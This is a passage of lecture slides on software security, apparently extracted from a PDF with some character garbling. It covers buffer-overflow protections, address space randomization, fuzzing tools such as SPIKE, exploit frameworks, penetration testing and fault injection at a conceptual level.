– Perl and Taint-‐mode • SubsecGons of language and/or code standards – C++ using only smart pointers, std::strings, and STL containers
– Managed Code and the Common RunGme Library (CRL)
120
Tools for Buffer Overflow ProtecGon
• LibSafe – h6p://www.research.avayalabs.com/project/libsafe/ – Intercept calls to funcGons with known problems and perform extra checks
– Source is not necessary • StackGuard and SSP/ProPolice – Place “canary” values at key places on stack – Terminator (fixed) or random values
– ProPolice patch to gcc
121
Address Space RandomizaGon
• Vary the base stack address with each execuGon – Stack smashing must have absolute address to over write funcGon return address
– Enabled by default in some linuxes (e.g., FC3)
• Wastes some address space – Less of an issue once we have 64 bit address space
• Not absolute – Try many Gmes and get lucky
Misc.
123
Fuzzing
• A variant of the fault injecGon model – Create “fuzzed” input to cause errors
• ShareFuzz – Intercept all getenv() calls to return very, very long strings
More Fuzz -‐ SPIKE
• An input language for creaGng variant network packets
• From WireShark output, make it easy to express new packets – a_binary(“00 01 02 03”) Data: <00 01 02 03>
– a_block_size_big-‐endian_word(“Blockname”); Data: <00 01 02 03 00 00 00 00>
– a_block_start(“Blockname”) a_binary(“05 06 07 08”) Data: <00 01 02 03 00 00 00 00 05 06 07 08>
– a_block_end(“Blockname”); Data: <00 01 02 03 00 00 00 04 05 06 07 08>
Exploit Frameworks
• Metasploit – h6p://www.metasploit.com/index.html
• Canvas – h6p://www.immunitysec.com
• Core Impact – h6p://www.coresecurity.com/products/coreimpact/index.php
Defense Through A6ack
• Ethical hacking – You too can become a cerGfied ethical hacker • h6p://www.wired.com/news/infostructure/0,1377,64008,00.html • h6p://www.vigilar.com/training/ceh/index.html?gclid=CKSSs-‐_EvIgCFSAeWAodGm7MaQ
• Hip term for – PenetraGon TesGng – Vulnerability analysis – Vulnerability researching
PenetraGon TesGng • Bring in outside team to “a6ack” system – Well-‐defined rules of engagement, e.g., • no DOS but social engineering is allowed • Specified target of a6ack • Cause no permanent damage • Amount of inside knowledge
• Benefits – Ability to think outside the box may reveal new issues
• Concerns – All discovered flaws reported? – Probably not systemaGc
Vulnerability Research
• Find exploits in deployed sofware – Zero Day exploit – Exploit that is released before fix is available
• Ethical issues once exploit is found – How soon to reveal exploit afer giving vendor heads up?
– Can you protect your customers in the mean Gme?
Sofware Fault InjecGon
• Hardware fault injecGon well used and understood – Sofware fault injecGon sGll emerging – AcGve research area at CSL
• IdenGfy input areas – Generally network, but could also be files, environment variables, command line
• Inject bad inputs and see what happens
Fault InjecGon Model
Server Client
Fault Injector
Auditor